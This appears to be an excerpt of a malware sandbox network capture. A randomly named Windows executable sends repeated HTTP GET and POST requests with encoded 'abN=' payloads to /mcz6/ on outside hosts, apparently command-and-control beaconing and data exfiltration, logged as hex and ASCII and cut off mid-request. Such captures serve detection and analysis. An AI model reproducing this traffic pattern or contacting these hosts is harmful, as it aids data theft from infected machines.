Jun 5, 2024 15:08:50.197731018 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:08:50 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49784	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:52.065438032 CEST	479	OUT	GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:08:52.719595909 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:08:52 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49785	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:57.769545078 CEST	745	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 42 68 72 63 48 62 67 77 66 32 6c 4a 52 31 72 42 47 47 52 7a 31 4e 52 30 55 79 69 5a 66 64 4d 67 66 67 3d 3d Data Ascii: abN=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXBhrcHbgwf2lJR1rBGGRz1NR0UyiZfdMgfg==
Jun 5, 2024 15:08:58.432151079 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:08:58 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49786	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:00.299212933 CEST	765	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 57 46 6e 50 64 50 74 67 58 7a 67 70 2f 42 47 4b 39 4b 32 63 35 68 2b 4d 70 46 6d 7a 57 48 47 65 70 70 43 54 41 61 4d 4e 4e 6b 4c 74 72 76 44 63 47 4c 46 5a 4e 69 64 5a 43 5a 4e 41 63 41 55 30 61 37 63 75 41 43 5a 41 33 4c 46 75 43 47 54 68 33 51 4a 37 41 74 6d 66 30 32 50 71 4e 69 77 67 55 46 7a 47 53 7a 6a 33 68 32 48 65 30 52 65 74 6a 5a 43 30 44 61 42 77 57 54 47 49 6b 75 53 30 70 2b 51 7a 36 62 58 33 77 6b 6e 4e 31 48 4a 31 72 74 53 65 78 70 45 70 79 4b 36 78 55 66 52 34 58 2b 4f 61 72 59 6d 4f 38 77 70 69 73 3d Data Ascii: abN=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmzWHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUFzGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknN1HJ1rtSexpEpyK6xUfR4X+OarYmO8wpis=
Jun 5, 2024 15:09:00.967647076 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:09:00 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49787	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:02.828587055 CEST	10847	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 4f 46 6d 39 56 50 73 48 44 7a 68 70 2f 42 4f 71 39 61 32 63 35 47 2b 4d 68 42 6d 7a 53 35 47 63 52 70 43 77 49 61 4b 35 5a 6b 46 74 72 76 63 4d 47 4b 49 35 4e 33 64 5a 53 46 4e 41 4d 41 55 30 61 37 63 74 59 43 51 30 72 4c 44 75 43 5a 44 78 33 55 44 62 41 57 6d 66 73 41 50 71 49 56 77 54 4d 46 7a 6d 43 7a 75 68 31 32 59 75 30 58 64 74 6a 42 43 30 4f 61 42 78 36 78 47 4c 34 49 53 32 31 2b 55 6e 2f 2f 42 7a 34 51 39 75 78 59 58 48 66 55 53 65 4e 32 4c 61 36 50 2f 55 4d 6e 45 63 66 7a 45 59 2b 4d 2f 64 63 6a 34 56 31 4a 73 56 46 33 68 43 77 58 45 65 53 50 39 47 38 63 39 55 47 48 77 38 41 4e 51 2b 41 47 77 72 6c 62 53 4f 78 30 72 43 63 76 7a 57 2b 67 70 6a 34 6a 76 67 54 55 49 70 49 39 38 66 6e 35 51 6b 79 56 34 75 6d 4f 45 45 37 63 36 48 4b 54 33 49 64 45 52 69 54 4b 4b 45 71 4d 54 63 4b 71 44 6f 65 65 73 6d 4d 4f 54 2f 67 72 73 56 78 78 52 44 6b 52 4b 2f 39 75 53 35 [TRUNCATED] Data Ascii: abN=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5OFm9VPsHDzhp/BOq9a2c5G+MhBmzS5GcRpCwIaK5ZkFtrvcMGKI5N3dZSFNAMAU0a7ctYCQ0rLDuCZDx3UDbAWmfsAPqIVwTMFzmCzuh12Yu0XdtjBC0OaBx6xGL4IS21+Un//Bz4Q9uxYXHfUSeN2La6P/UMnEcfzEY+M/dcj4V1JsVF3hCwXEeSP9G8c9UGHw8ANQ+AGwrlbSOx0rCcvzW+gpj4jvgTUIpI98fn5QkyV4umOEE7c6HKT3IdERiTKKEqMTcKqDoeesmMOT/grsVxxRDkRK/9uS5McNu24f5Oh6xP3M+yzd5yLAcBtRZPhxiAR8JMMddaXwrcUZh8t45pwso/pb9LqRD62oKM4mHmatekqATO/7g1+x1UAL/Cj+YfOqiS1uEc0DwSGqBVYzyDqPfLqEWjL57+szTki5Dy79py+ZfiQ2+xZTn/mhwy7DEuC9wbtlNdZaC5SH1m0aA+eY44qdghPqXpl1O7aYEP5EUrbiEObf3hDyM4HP0f0K0vPvc8u/DyryQ7K+7ElctIKBQgE/rmSpyl5XucGbuMN9uKBpzdgPIMQcELwuTr3wdivZZmUZIOo1BhQMQc8GBDHI38/15DaaYZ/XAtr2BcTDRyEOuczbivRN0iGlCexnsGIAqujqpk50V8vSt5UdhjYo483hhRuJWwIPFPO0WixevAZVAPGzCyk5bDwFYXtIlVGbOf6h7WEj/rRBVBxejRETLpxfXOAyK6dz2BIQHhewvmdodHJnWOz6MYSJ07hfwh5iNNZ7f4A9YycstJFZCRosfR40DuV7AnRPzFYPqxzQd+X9IkBQBDhM5LMK22ChZ0WLQ6thdH4LK+XtGVnpvHRwKb6s2lj4szBNwJiGK7h0TZOU1tc5IONnw7a7EQm/bYKr+p50SR6A3ahIUJAdyz0auO8VwDOwaRgV+/FxMiJ7/+beZnY9w5gJKYyheUWpgG9 [TRUNCATED]
Jun 5, 2024 15:09:03.485804081 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:09:03 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49788	57.151.38.169	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:05.750122070 CEST	481	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98= HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:09:06.437405109 CEST	494	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:09:06 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98= Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49789	162.241.216.140	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:11.500533104 CEST	739	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: abN=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 5, 2024 15:09:12.161384106 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:09:12 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49790	162.241.216.140	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:14.031066895 CEST	759	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 65 69 66 64 70 42 64 44 39 54 61 34 6e 63 4c 47 74 39 69 65 78 64 5a 6e 2b 52 38 4b 78 71 53 59 34 3d Data Ascii: abN=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LeifdpBdD9Ta4ncLGt9iexdZn+R8KxqSY4=
Jun 5, 2024 15:09:14.704629898 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:09:14 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49791	162.241.216.140	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:16.564799070 CEST	10841	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 71 73 64 41 6d 66 52 6e 57 57 38 4b 79 39 44 74 4a 62 56 51 73 56 56 35 76 43 44 6d 